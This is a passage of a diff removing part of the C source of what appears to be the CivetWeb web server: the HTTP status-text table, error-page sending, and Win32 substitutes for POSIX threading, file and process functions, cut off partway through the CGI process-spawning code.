-	/* RFC2616 Section 10.4 - Client Error 4xx */
-	case 400:
-		return "Bad Request"; /* RFC2616 Section 10.4.1 */
-	case 401:
-		return "Unauthorized"; /* RFC2616 Section 10.4.2 */
-	case 402:
-		return "Payment Required"; /* RFC2616 Section 10.4.3 */
-	case 403:
-		return "Forbidden"; /* RFC2616 Section 10.4.4 */
-	case 404:
-		return "Not Found"; /* RFC2616 Section 10.4.5 */
-	case 405:
-		return "Method Not Allowed"; /* RFC2616 Section 10.4.6 */
-	case 406:
-		return "Not Acceptable"; /* RFC2616 Section 10.4.7 */
-	case 407:
-		return "Proxy Authentication Required"; /* RFC2616 Section 10.4.8 */
-	case 408:
-		return "Request Time-out"; /* RFC2616 Section 10.4.9 */
-	case 409:
-		return "Conflict"; /* RFC2616 Section 10.4.10 */
-	case 410:
-		return "Gone"; /* RFC2616 Section 10.4.11 */
-	case 411:
-		return "Length Required"; /* RFC2616 Section 10.4.12 */
-	case 412:
-		return "Precondition Failed"; /* RFC2616 Section 10.4.13 */
-	case 413:
-		return "Request Entity Too Large"; /* RFC2616 Section 10.4.14 */
-	case 414:
-		return "Request-URI Too Large"; /* RFC2616 Section 10.4.15 */
-	case 415:
-		return "Unsupported Media Type"; /* RFC2616 Section 10.4.16 */
-	case 416:
-		return "Requested range not satisfiable"; /* RFC2616 Section 10.4.17
-		                                             */
-	case 417:
-		return "Expectation Failed"; /* RFC2616 Section 10.4.18 */
-
-	case 421:
-		return "Misdirected Request"; /* RFC7540 Section 9.1.2 */
-	case 422:
-		return "Unproccessable entity"; /* RFC2518 Section 10.3, RFC4918
-		                                 * Section 11.2 */
-	case 423:
-		return "Locked"; /* RFC2518 Section 10.4, RFC4918 Section 11.3 */
-	case 424:
-		return "Failed Dependency"; /* RFC2518 Section 10.5, RFC4918
-		                             * Section 11.4 */
-
-	case 426:
-		return "Upgrade Required"; /* RFC 2817 Section 4 */
-
-	case 428:
-		return "Precondition Required"; /* RFC 6585, Section 3 */
-	case 429:
-		return "Too Many Requests"; /* RFC 6585, Section 4 */
-
-	case 431:
-		return "Request Header Fields Too Large"; /* RFC 6585, Section 5 */
-
-	case 451:
-		return "Unavailable For Legal Reasons"; /* draft-tbray-http-legally-restricted-status-05,
-		                                         * Section 3 */
-
-	/* RFC2616 Section 10.5 - Server Error 5xx */
-	case 500:
-		return "Internal Server Error"; /* RFC2616 Section 10.5.1 */
-	case 501:
-		return "Not Implemented"; /* RFC2616 Section 10.5.2 */
-	case 502:
-		return "Bad Gateway"; /* RFC2616 Section 10.5.3 */
-	case 503:
-		return "Service Unavailable"; /* RFC2616 Section 10.5.4 */
-	case 504:
-		return "Gateway Time-out"; /* RFC2616 Section 10.5.5 */
-	case 505:
-		return "HTTP Version not supported"; /* RFC2616 Section 10.5.6 */
-	case 506:
-		return "Variant Also Negotiates"; /* RFC 2295, Section 8.1 */
-	case 507:
-		return "Insufficient Storage"; /* RFC2518 Section 10.6, RFC4918
-		                                * Section 11.5 */
-	case 508:
-		return "Loop Detected"; /* RFC5842 Section 7.1 */
-
-	case 510:
-		return "Not Extended"; /* RFC 2774, Section 7 */
-	case 511:
-		return "Network Authentication Required"; /* RFC 6585, Section 6 */
-
-	/* Other status codes, not shown in the IANA HTTP status code
-	 * assignment.
-	 * E.g., "de facto" standards due to common use, ... */
-	case 418:
-		return "I am a teapot"; /* RFC2324 Section 2.3.2 */
-	case 419:
-		return "Authentication Timeout"; /* common use */
-	case 420:
-		return "Enhance Your Calm"; /* common use */
-	case 440:
-		return "Login Timeout"; /* common use */
-	case 509:
-		return "Bandwidth Limit Exceeded"; /* common use */
-
-	default:
-		/* This error code is unknown. This should not happen. */
-		if (conn) {
-			mg_cry(conn, "Unknown HTTP response code: %u", response_code);
-		}
-
-		/* Return at least a category according to RFC 2616 Section 10. */
-		if (response_code >= 100 && response_code < 200) {
-			/* Unknown informational status code */
-			return "Information";
-		}
-		if (response_code >= 200 && response_code < 300) {
-			/* Unknown success code */
-			return "Success";
-		}
-		if (response_code >= 300 && response_code < 400) {
-			/* Unknown redirection code */
-			return "Redirection";
-		}
-		if (response_code >= 400 && response_code < 500) {
-			/* Unknown request error code */
-			return "Client Error";
-		}
-		if (response_code >= 500 && response_code < 600) {
-			/* Unknown server error code */
-			return "Server Error";
-		}
-
-		/* Response code not even within reasonable range */
-		return "";
-	}
-}
-
-
-void
-mg_send_http_error(struct mg_connection *conn, int status, const char *fmt, ...)
-{
-	char buf[MG_BUF_LEN];
-	va_list ap;
-	int len, i, page_handler_found, scope, truncated, has_body;
-	char date[64];
-	time_t curtime = time(NULL);
-	const char *error_handler = NULL;
-	struct mg_file error_page_file = STRUCT_FILE_INITIALIZER;
-	const char *error_page_file_ext, *tstr;
-
-	const char *status_text = mg_get_response_code_text(conn, status);
-
-	if (conn == NULL) {
-		return;
-	}
-
-	conn->status_code = status;
-	if (conn->in_error_handler || (conn->ctx->callbacks.http_error == NULL)
-	    || conn->ctx->callbacks.http_error(conn, status)) {
-
-		/* Check for recursion */
-		if (conn->in_error_handler) {
-			DEBUG_TRACE(
-			    "Recursion when handling error %u - fall back to default",
-			    status);
-		} else {
-			/* Send user defined error pages, if defined */
-			error_handler = conn->ctx->config[ERROR_PAGES];
-			error_page_file_ext = conn->ctx->config[INDEX_FILES];
-			page_handler_found = 0;
-
-			if (error_handler != NULL) {
-				for (scope = 1; (scope <= 3) && !page_handler_found; scope++) {
-					switch (scope) {
-					case 1: /* Handler for specific error, e.g. 404 error */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror%03u.",
-						            error_handler,
-						            status);
-						break;
-					case 2: /* Handler for error group, e.g., 5xx error
-					         * handler
-					         * for all server errors (500-599) */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror%01uxx.",
-						            error_handler,
-						            status / 100);
-						break;
-					default: /* Handler for all errors */
-						mg_snprintf(conn,
-						            &truncated,
-						            buf,
-						            sizeof(buf) - 32,
-						            "%serror.",
-						            error_handler);
-						break;
-					}
-
-					/* String truncation in buf may only occur if
-					 * error_handler is too long. This string is
-					 * from the config, not from a client. */
-					(void)truncated;
-
-					len = (int)strlen(buf);
-
-					tstr = strchr(error_page_file_ext, '.');
-
-					while (tstr) {
-						for (i = 1;
-						     (i < 32) && (tstr[i] != 0) && (tstr[i] != ',');
-						     i++)
-							buf[len + i - 1] = tstr[i];
-						buf[len + i - 1] = 0;
-
-						if (mg_stat(conn, buf, &error_page_file.stat)) {
-							DEBUG_TRACE("Check error page %s - found", buf);
-							page_handler_found = 1;
-							break;
-						}
-						DEBUG_TRACE("Check error page %s - not found", buf);
-
-						tstr = strchr(tstr + i, '.');
-					}
-				}
-			}
-
-			if (page_handler_found) {
-				conn->in_error_handler = 1;
-				handle_file_based_request(conn, buf, &error_page_file);
-				conn->in_error_handler = 0;
-				return;
-			}
-		}
-
-		/* No custom error page. Send default error page. */
-		gmt_time_string(date, sizeof(date), &curtime);
-
-		/* Errors 1xx, 204 and 304 MUST NOT send a body */
-		has_body = ((status > 199) && (status != 204) && (status != 304));
-
-		conn->must_close = 1;
-		mg_printf(conn, "HTTP/1.1 %d %s\r\n", status, status_text);
-		send_no_cache_header(conn);
-		send_additional_header(conn);
-		if (has_body) {
-			mg_printf(conn,
-			          "%s",
-			          "Content-Type: text/plain; charset=utf-8\r\n");
-		}
-		mg_printf(conn,
-		          "Date: %s\r\n"
-		          "Connection: close\r\n\r\n",
-		          date);
-
-		/* Errors 1xx, 204 and 304 MUST NOT send a body */
-		if (has_body) {
-			mg_printf(conn, "Error %d: %s\n", status, status_text);
-
-			if (fmt != NULL) {
-				va_start(ap, fmt);
-				mg_vsnprintf(conn, NULL, buf, sizeof(buf), fmt, ap);
-				va_end(ap);
-				mg_write(conn, buf, strlen(buf));
-				DEBUG_TRACE("Error %i - [%s]", status, buf);
-			}
-
-		} else {
-			/* No body allowed. Close the connection. */
-			DEBUG_TRACE("Error %i", status);
-		}
-	}
-}
-
-#if defined(_WIN32) && !defined(__SYMBIAN32__)
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_init(pthread_mutex_t *mutex, void *unused)
-{
-	(void)unused;
-	*mutex = CreateMutex(NULL, FALSE, NULL);
-	return (*mutex == NULL) ? -1 : 0;
-}
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_destroy(pthread_mutex_t *mutex)
-{
-	return (CloseHandle(*mutex) == 0) ? -1 : 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_lock(pthread_mutex_t *mutex)
-{
-	return (WaitForSingleObject(*mutex, (DWORD)INFINITE) == WAIT_OBJECT_0) ? 0
-	                                                                       : -1;
-}
-
-
-#ifdef ENABLE_UNUSED_PTHREAD_FUNCTIONS
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_trylock(pthread_mutex_t *mutex)
-{
-	switch (WaitForSingleObject(*mutex, 0)) {
-	case WAIT_OBJECT_0:
-		return 0;
-	case WAIT_TIMEOUT:
-		return -2; /* EBUSY */
-	}
-	return -1;
-}
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_mutex_unlock(pthread_mutex_t *mutex)
-{
-	return (ReleaseMutex(*mutex) == 0) ? -1 : 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_init(pthread_cond_t *cv, const void *unused)
-{
-	(void)unused;
-	InitializeCriticalSection(&cv->threadIdSec);
-	cv->waiting_thread = NULL;
-	return 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_timedwait(pthread_cond_t *cv,
-                       pthread_mutex_t *mutex,
-                       const struct timespec *abstime)
-{
-	struct mg_workerTLS **ptls,
-	    *tls = (struct mg_workerTLS *)pthread_getspecific(sTlsKey);
-	int ok;
-	int64_t nsnow, nswaitabs, nswaitrel;
-	DWORD mswaitrel;
-
-	EnterCriticalSection(&cv->threadIdSec);
-	/* Add this thread to cv's waiting list */
-	ptls = &cv->waiting_thread;
-	for (; *ptls != NULL; ptls = &(*ptls)->next_waiting_thread)
-		;
-	tls->next_waiting_thread = NULL;
-	*ptls = tls;
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	if (abstime) {
-		nsnow = mg_get_current_time_ns();
-		nswaitabs =
-		    (((int64_t)abstime->tv_sec) * 1000000000) + abstime->tv_nsec;
-		nswaitrel = nswaitabs - nsnow;
-		if (nswaitrel < 0) {
-			nswaitrel = 0;
-		}
-		mswaitrel = (DWORD)(nswaitrel / 1000000);
-	} else {
-		mswaitrel = (DWORD)INFINITE;
-	}
-
-	pthread_mutex_unlock(mutex);
-	ok = (WAIT_OBJECT_0
-	      == WaitForSingleObject(tls->pthread_cond_helper_mutex, mswaitrel));
-	if (!ok) {
-		ok = 1;
-		EnterCriticalSection(&cv->threadIdSec);
-		ptls = &cv->waiting_thread;
-		for (; *ptls != NULL; ptls = &(*ptls)->next_waiting_thread) {
-			if (*ptls == tls) {
-				*ptls = tls->next_waiting_thread;
-				ok = 0;
-				break;
-			}
-		}
-		LeaveCriticalSection(&cv->threadIdSec);
-		if (ok) {
-			WaitForSingleObject(tls->pthread_cond_helper_mutex,
-			                    (DWORD)INFINITE);
-		}
-	}
-	/* This thread has been removed from cv's waiting list */
-	pthread_mutex_lock(mutex);
-
-	return ok ? 0 : -1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_wait(pthread_cond_t *cv, pthread_mutex_t *mutex)
-{
-	return pthread_cond_timedwait(cv, mutex, NULL);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_signal(pthread_cond_t *cv)
-{
-	HANDLE wkup = NULL;
-	BOOL ok = FALSE;
-
-	EnterCriticalSection(&cv->threadIdSec);
-	if (cv->waiting_thread) {
-		wkup = cv->waiting_thread->pthread_cond_helper_mutex;
-		cv->waiting_thread = cv->waiting_thread->next_waiting_thread;
-
-		ok = SetEvent(wkup);
-		assert(ok);
-	}
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	return ok ? 0 : 1;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_broadcast(pthread_cond_t *cv)
-{
-	EnterCriticalSection(&cv->threadIdSec);
-	while (cv->waiting_thread) {
-		pthread_cond_signal(cv);
-	}
-	LeaveCriticalSection(&cv->threadIdSec);
-
-	return 0;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-pthread_cond_destroy(pthread_cond_t *cv)
-{
-	EnterCriticalSection(&cv->threadIdSec);
-	assert(cv->waiting_thread == NULL);
-	LeaveCriticalSection(&cv->threadIdSec);
-	DeleteCriticalSection(&cv->threadIdSec);
-
-	return 0;
-}
-
-
-#ifdef ALTERNATIVE_QUEUE
-FUNCTION_MAY_BE_UNUSED
-static void *
-event_create(void)
-{
-	return (void *)CreateEvent(NULL, FALSE, FALSE, NULL);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-event_wait(void *eventhdl)
-{
-	int res = WaitForSingleObject((HANDLE)eventhdl, (DWORD)INFINITE);
-	return (res == WAIT_OBJECT_0);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-event_signal(void *eventhdl)
-{
-	return (int)SetEvent((HANDLE)eventhdl);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static void
-event_destroy(void *eventhdl)
-{
-	CloseHandle((HANDLE)eventhdl);
-}
-#endif
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-
-/* For Windows, change all slashes to backslashes in path names. */
-static void
-change_slashes_to_backslashes(char *path)
-{
-	int i;
-
-	for (i = 0; path[i] != '\0'; i++) {
-		if (path[i] == '/') {
-			path[i] = '\\';
-		}
-
-		/* remove double backslash (check i > 0 to preserve UNC paths,
-		 * like \\server\file.txt) */
-		if ((path[i] == '\\') && (i > 0)) {
-			while ((path[i + 1] == '\\') || (path[i + 1] == '/')) {
-				(void)memmove(path + i + 1, path + i + 2, strlen(path + i + 1));
-			}
-		}
-	}
-}
-
-
-static int
-mg_wcscasecmp(const wchar_t *s1, const wchar_t *s2)
-{
-	int diff;
-
-	do {
-		diff = tolower(*s1) - tolower(*s2);
-		s1++;
-		s2++;
-	} while ((diff == 0) && (s1[-1] != '\0'));
-
-	return diff;
-}
-
-
-/* Encode 'path' which is assumed UTF-8 string, into UNICODE string.
- * wbuf and wbuf_len is a target buffer and its length. */
-static void
-path_to_unicode(const struct mg_connection *conn,
-                const char *path,
-                wchar_t *wbuf,
-                size_t wbuf_len)
-{
-	char buf[PATH_MAX], buf2[PATH_MAX];
-	wchar_t wbuf2[MAX_PATH + 1];
-	DWORD long_len, err;
-	int (*fcompare)(const wchar_t *, const wchar_t *) = mg_wcscasecmp;
-
-	mg_strlcpy(buf, path, sizeof(buf));
-	change_slashes_to_backslashes(buf);
-
-	/* Convert to Unicode and back. If doubly-converted string does not
-	 * match the original, something is fishy, reject. */
-	memset(wbuf, 0, wbuf_len * sizeof(wchar_t));
-	MultiByteToWideChar(CP_UTF8, 0, buf, -1, wbuf, (int)wbuf_len);
-	WideCharToMultiByte(
-	    CP_UTF8, 0, wbuf, (int)wbuf_len, buf2, sizeof(buf2), NULL, NULL);
-	if (strcmp(buf, buf2) != 0) {
-		wbuf[0] = L'\0';
-	}
-
-	/* Windows file systems are not case sensitive, but you can still use
-	 * uppercase and lowercase letters (on all modern file systems).
-	 * The server can check if the URI uses the same upper/lowercase
-	 * letters an the file system, effectively making Windows servers
-	 * case sensitive (like Linux servers are). It is still not possible
-	 * to use two files with the same name in different cases on Windows
-	 * (like /a and /A) - this would be possible in Linux.
-	 * As a default, Windows is not case sensitive, but the case sensitive
-	 * file name check can be activated by an additional configuration. */
-	if (conn) {
-		if (conn->ctx->config[CASE_SENSITIVE_FILES]
-		    && !mg_strcasecmp(conn->ctx->config[CASE_SENSITIVE_FILES], "yes")) {
-			/* Use case sensitive compare function */
-			fcompare = wcscmp;
-		}
-	}
-	(void)conn; /* conn is currently unused */
-
-#if !defined(_WIN32_WCE)
-	/* Only accept a full file path, not a Windows short (8.3) path. */
-	memset(wbuf2, 0, ARRAY_SIZE(wbuf2) * sizeof(wchar_t));
-	long_len = GetLongPathNameW(wbuf, wbuf2, ARRAY_SIZE(wbuf2) - 1);
-	if (long_len == 0) {
-		err = GetLastError();
-		if (err == ERROR_FILE_NOT_FOUND) {
-			/* File does not exist. This is not always a problem here. */
-			return;
-		}
-	}
-	if ((long_len >= ARRAY_SIZE(wbuf2)) || (fcompare(wbuf, wbuf2) != 0)) {
-		/* Short name is used. */
-		wbuf[0] = L'\0';
-	}
-#else
-	(void)long_len;
-	(void)wbuf2;
-	(void)err;
-
-	if (strchr(path, '~')) {
-		wbuf[0] = L'\0';
-	}
-#endif
-}
-
-
-/* Windows happily opens files with some garbage at the end of file name.
- * For example, fopen("a.cgi    ", "r") on Windows successfully opens
- * "a.cgi", despite one would expect an error back.
- * This function returns non-0 if path ends with some garbage. */
-static int
-path_cannot_disclose_cgi(const char *path)
-{
-	static const char *allowed_last_characters = "_-";
-	int last = path[strlen(path) - 1];
-	return isalnum(last) || strchr(allowed_last_characters, last) != NULL;
-}
-
-
-static int
-mg_stat(const struct mg_connection *conn,
-        const char *path,
-        struct mg_file_stat *filep)
-{
-	wchar_t wbuf[PATH_MAX];
-	WIN32_FILE_ATTRIBUTE_DATA info;
-	time_t creation_time;
-
-	if (!filep) {
-		return 0;
-	}
-	memset(filep, 0, sizeof(*filep));
-
-	if (conn && is_file_in_memory(conn, path)) {
-		/* filep->is_directory = 0; filep->gzipped = 0; .. already done by
-		 * memset */
-
-		/* Quick fix (for 1.9.x): */
-		/* mg_stat must fill all fields, also for files in memory */
-		struct mg_file tmp_file = STRUCT_FILE_INITIALIZER;
-		open_file_in_memory(conn, path, &tmp_file, MG_FOPEN_MODE_NONE);
-		filep->size = tmp_file.stat.size;
-		filep->location = 2;
-		/* TODO: for 1.10: restructure how files in memory are handled */
-
-		/* The "file in memory" feature is a candidate for deletion.
-		 * Please join the discussion at
-		 * https://groups.google.com/forum/#!topic/civetweb/h9HT4CmeYqI
-		 */
-
-		filep->last_modified = time(NULL); /* TODO */
-		/* last_modified = now ... assumes the file may change during
-		 * runtime,
-		 * so every mg_fopen call may return different data */
-		/* last_modified = conn->ctx.start_time;
-		 * May be used it the data does not change during runtime. This
-		 * allows
-		 * browser caching. Since we do not know, we have to assume the file
-		 * in memory may change. */
-		return 1;
-	}
-
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	if (GetFileAttributesExW(wbuf, GetFileExInfoStandard, &info) != 0) {
-		filep->size = MAKEUQUAD(info.nFileSizeLow, info.nFileSizeHigh);
-		filep->last_modified =
-		    SYS2UNIX_TIME(info.ftLastWriteTime.dwLowDateTime,
-		                  info.ftLastWriteTime.dwHighDateTime);
-
-		/* On Windows, the file creation time can be higher than the
-		 * modification time, e.g. when a file is copied.
-		 * Since the Last-Modified timestamp is used for caching
-		 * it should be based on the most recent timestamp. */
-		creation_time = SYS2UNIX_TIME(info.ftCreationTime.dwLowDateTime,
-		                              info.ftCreationTime.dwHighDateTime);
-		if (creation_time > filep->last_modified) {
-			filep->last_modified = creation_time;
-		}
-
-		filep->is_directory = info.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY;
-		/* If file name is fishy, reset the file structure and return
-		 * error.
-		 * Note it is important to reset, not just return the error, cause
-		 * functions like is_file_opened() check the struct. */
-		if (!filep->is_directory && !path_cannot_disclose_cgi(path)) {
-			memset(filep, 0, sizeof(*filep));
-			return 0;
-		}
-
-		return 1;
-	}
-
-	return 0;
-}
-
-
-static int
-mg_remove(const struct mg_connection *conn, const char *path)
-{
-	wchar_t wbuf[PATH_MAX];
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	return DeleteFileW(wbuf) ? 0 : -1;
-}
-
-
-static int
-mg_mkdir(const struct mg_connection *conn, const char *path, int mode)
-{
-	wchar_t wbuf[PATH_MAX];
-	(void)mode;
-	path_to_unicode(conn, path, wbuf, ARRAY_SIZE(wbuf));
-	return CreateDirectoryW(wbuf, NULL) ? 0 : -1;
-}
-
-
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-/* Implementation of POSIX opendir/closedir/readdir for Windows. */
-FUNCTION_MAY_BE_UNUSED
-static DIR *
-mg_opendir(const struct mg_connection *conn, const char *name)
-{
-	DIR *dir = NULL;
-	wchar_t wpath[PATH_MAX];
-	DWORD attrs;
-
-	if (name == NULL) {
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	} else if ((dir = (DIR *)mg_malloc(sizeof(*dir))) == NULL) {
-		SetLastError(ERROR_NOT_ENOUGH_MEMORY);
-	} else {
-		path_to_unicode(conn, name, wpath, ARRAY_SIZE(wpath));
-		attrs = GetFileAttributesW(wpath);
-		if (attrs != 0xFFFFFFFF && ((attrs & FILE_ATTRIBUTE_DIRECTORY)
-		                            == FILE_ATTRIBUTE_DIRECTORY)) {
-			(void)wcscat(wpath, L"\\*");
-			dir->handle = FindFirstFileW(wpath, &dir->info);
-			dir->result.d_name[0] = '\0';
-		} else {
-			mg_free(dir);
-			dir = NULL;
-		}
-	}
-
-	return dir;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-mg_closedir(DIR *dir)
-{
-	int result = 0;
-
-	if (dir != NULL) {
-		if (dir->handle != INVALID_HANDLE_VALUE)
-			result = FindClose(dir->handle) ? 0 : -1;
-
-		mg_free(dir);
-	} else {
-		result = -1;
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	}
-
-	return result;
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static struct dirent *
-mg_readdir(DIR *dir)
-{
-	struct dirent *result = 0;
-
-	if (dir) {
-		if (dir->handle != INVALID_HANDLE_VALUE) {
-			result = &dir->result;
-			(void)WideCharToMultiByte(CP_UTF8,
-			                          0,
-			                          dir->info.cFileName,
-			                          -1,
-			                          result->d_name,
-			                          sizeof(result->d_name),
-			                          NULL,
-			                          NULL);
-
-			if (!FindNextFileW(dir->handle, &dir->info)) {
-				(void)FindClose(dir->handle);
-				dir->handle = INVALID_HANDLE_VALUE;
-			}
-
-		} else {
-			SetLastError(ERROR_FILE_NOT_FOUND);
-		}
-	} else {
-		SetLastError(ERROR_BAD_ARGUMENTS);
-	}
-
-	return result;
-}
-
-
-#ifndef HAVE_POLL
-FUNCTION_MAY_BE_UNUSED
-static int
-poll(struct pollfd *pfd, unsigned int n, int milliseconds)
-{
-	struct timeval tv;
-	fd_set set;
-	unsigned int i;
-	int result;
-	SOCKET maxfd = 0;
-
-	memset(&tv, 0, sizeof(tv));
-	tv.tv_sec = milliseconds / 1000;
-	tv.tv_usec = (milliseconds % 1000) * 1000;
-	FD_ZERO(&set);
-
-	for (i = 0; i < n; i++) {
-		FD_SET((SOCKET)pfd[i].fd, &set);
-		pfd[i].revents = 0;
-
-		if (pfd[i].fd > maxfd) {
-			maxfd = pfd[i].fd;
-		}
-	}
-
-	if ((result = select((int)maxfd + 1, &set, NULL, NULL, &tv)) > 0) {
-		for (i = 0; i < n; i++) {
-			if (FD_ISSET(pfd[i].fd, &set)) {
-				pfd[i].revents = POLLIN;
-			}
-		}
-	}
-
-	/* We should subtract the time used in select from remaining
-	 * "milliseconds", in particular if called from mg_poll with a
-	 * timeout quantum.
-	 * Unfortunately, the remaining time is not stored in "tv" in all
-	 * implementations, so the result in "tv" must be considered undefined.
-	 * See http://man7.org/linux/man-pages/man2/select.2.html */
-
-	return result;
-}
-#endif /* HAVE_POLL */
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-
-static void
-set_close_on_exec(SOCKET sock, struct mg_connection *conn /* may be null */)
-{
-	(void)conn; /* Unused. */
-#if defined(_WIN32_WCE)
-	(void)sock;
-#else
-	(void)SetHandleInformation((HANDLE)(intptr_t)sock, HANDLE_FLAG_INHERIT, 0);
-#endif
-}
-
-
-int
-mg_start_thread(mg_thread_func_t f, void *p)
-{
-#if defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1)
-	/* Compile-time option to control stack size, e.g.
-	 * -DUSE_STACK_SIZE=16384
-	 */
-	return ((_beginthread((void(__cdecl *)(void *))f, USE_STACK_SIZE, p)
-	         == ((uintptr_t)(-1L)))
-	            ? -1
-	            : 0);
-#else
-	return (
-	    (_beginthread((void(__cdecl *)(void *))f, 0, p) == ((uintptr_t)(-1L)))
-	        ? -1
-	        : 0);
-#endif /* defined(USE_STACK_SIZE) && (USE_STACK_SIZE > 1) */
-}
-
-
-/* Start a thread storing the thread context. */
-static int
-mg_start_thread_with_id(unsigned(__stdcall *f)(void *),
-                        void *p,
-                        pthread_t *threadidptr)
-{
-	uintptr_t uip;
-	HANDLE threadhandle;
-	int result = -1;
-
-	uip = _beginthreadex(NULL, 0, (unsigned(__stdcall *)(void *))f, p, 0, NULL);
-	threadhandle = (HANDLE)uip;
-	if ((uip != (uintptr_t)(-1L)) && (threadidptr != NULL)) {
-		*threadidptr = threadhandle;
-		result = 0;
-	}
-
-	return result;
-}
-
-
-/* Wait for a thread to finish. */
-static int
-mg_join_thread(pthread_t threadid)
-{
-	int result;
-	DWORD dwevent;
-
-	result = -1;
-	dwevent = WaitForSingleObject(threadid, (DWORD)INFINITE);
-	if (dwevent == WAIT_FAILED) {
-		DEBUG_TRACE("WaitForSingleObject() failed, error %d", ERRNO);
-	} else {
-		if (dwevent == WAIT_OBJECT_0) {
-			CloseHandle(threadid);
-			result = 0;
-		}
-	}
-
-	return result;
-}
-
-#if !defined(NO_SSL_DL) && !defined(NO_SSL)
-/* If SSL is loaded dynamically, dlopen/dlclose is required. */
-/* Create substitutes for POSIX functions in Win32. */
-
-#if defined(__MINGW32__)
-/* Show no warning in case system functions are not used. */
-#pragma GCC diagnostic push
-#pragma GCC diagnostic ignored "-Wunused-function"
-#endif
-
-
-FUNCTION_MAY_BE_UNUSED
-static HANDLE
-dlopen(const char *dll_name, int flags)
-{
-	wchar_t wbuf[PATH_MAX];
-	(void)flags;
-	path_to_unicode(NULL, dll_name, wbuf, ARRAY_SIZE(wbuf));
-	return LoadLibraryW(wbuf);
-}
-
-
-FUNCTION_MAY_BE_UNUSED
-static int
-dlclose(void *handle)
-{
-	int result;
-
-	if (FreeLibrary((HMODULE)handle) != 0) {
-		result = 0;
-	} else {
-		result = -1;
-	}
-
-	return result;
-}
-
-
-#if defined(__MINGW32__)
-/* Enable unused function warning again */
-#pragma GCC diagnostic pop
-#endif
-
-#endif
-
-
-#if !defined(NO_CGI)
-#define SIGKILL (0)
-
-static int
-kill(pid_t pid, int sig_num)
-{
-	(void)TerminateProcess((HANDLE)pid, (UINT)sig_num);
-	(void)CloseHandle((HANDLE)pid);
-	return 0;
-}
-
-
-static void
-trim_trailing_whitespaces(char *s)
-{
-	char *e = s + strlen(s) - 1;
-	while ((e > s) && isspace(*(unsigned char *)e)) {
-		*e-- = '\0';
-	}
-}
-
-
-static pid_t
-spawn_process(struct mg_connection *conn,
-              const char *prog,
-              char *envblk,
-              char *envp[],
-              int fdin[2],
-              int fdout[2],
-              int fderr[2],
-              const char *dir)
-{
-	HANDLE me;
-	char *p, *interp, full_interp[PATH_MAX], full_dir[PATH_MAX],
-	    cmdline[PATH_MAX], buf[PATH_MAX];
-	int truncated;
-	struct mg_file file = STRUCT_FILE_INITIALIZER;
-	STARTUPINFOA si;
-	PROCESS_INFORMATION pi = {0};
-
-	(void)envp;
-
-	memset(&si, 0, sizeof(si));
-	si.cb = sizeof(si);
-
-	si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
-	si.wShowWindow = SW_HIDE;
-
-	me = GetCurrentProcess();
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fdin[0]),
-	                me,
-	                &si.hStdInput,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fdout[1]),
-	                me,
-	                &si.hStdOutput,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-	DuplicateHandle(me,
-	                (HANDLE)_get_osfhandle(fderr[1]),
-	                me,
-	                &si.hStdError,
-	                0,
-	                TRUE,
-	                DUPLICATE_SAME_ACCESS);
-
-	/* Mark handles that should not be inherited. See
-	 * https://msdn.microsoft.com/en-us/library/windows/desktop/ms682499%28v=vs.85%29.aspx
-	 */
-	SetHandleInformation((HANDLE)_get_osfhandle(fdin[1]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-	SetHandleInformation((HANDLE)_get_osfhandle(fdout[0]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-	SetHandleInformation((HANDLE)_get_osfhandle(fderr[0]),
-	                     HANDLE_FLAG_INHERIT,
-	                     0);
-
-	/* If CGI file is a script, try to read the interpreter line */
-	interp = conn->ctx->config[CGI_INTERPRETER];
-	if (interp == NULL) {
-		buf[0] = buf[1] = '\0';
-
-		/* Read the first line of the script into the buffer */
-		mg_snprintf(
-		    conn, &truncated, cmdline, sizeof(cmdline), "%s/%s", dir, prog);
-
-		if (truncated) {
-			pi.hProcess = (pid_t)-1;
